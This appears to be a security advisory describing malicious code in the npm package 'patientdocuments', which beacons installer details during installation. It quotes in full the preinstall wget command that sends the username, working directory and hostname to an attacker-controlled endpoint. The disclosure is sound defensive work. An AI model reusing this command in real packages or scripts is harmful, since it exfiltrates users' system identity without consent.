—

MAL-2026-5752

Malicious code in patientdocuments (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (56c5ab4dc6470deaebe29f4851edb91bc5d5704e9f9578a91e238490708c007b) package.json declares a preinstall lifecycle script that runs `wget --quiet "http://orwa-orwa.dev-node-lap.workers.dev/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)"`, firing automatically on `npm install`. The script leaks the installer's OS username, current working directory, and hostname to an attacker-controlled Cloudflare Workers endpoint over plain HTTP. The same beacon is duplicated in the `test` and `preupdate` scripts. The package ships no library code (no main module shipped), so its sole effect is the recon beacon. `unsafe-perm` is set, ensuring execution as root in privileged install contexts. This is a dependency-confusion / recon-beacon pattern: identity exfiltration with no legitimate purpose tied to the package's advertised function.

Are you affected?

Enter the version of the package you're using.

Affected packages

npm / patientdocuments

No fixed version published yet for patientdocuments (npm). Pin to a known-safe version or switch to an alternative.

References

https://www.npmjs.com/package/patientdocuments/v/75.0.0 [PACKAGE]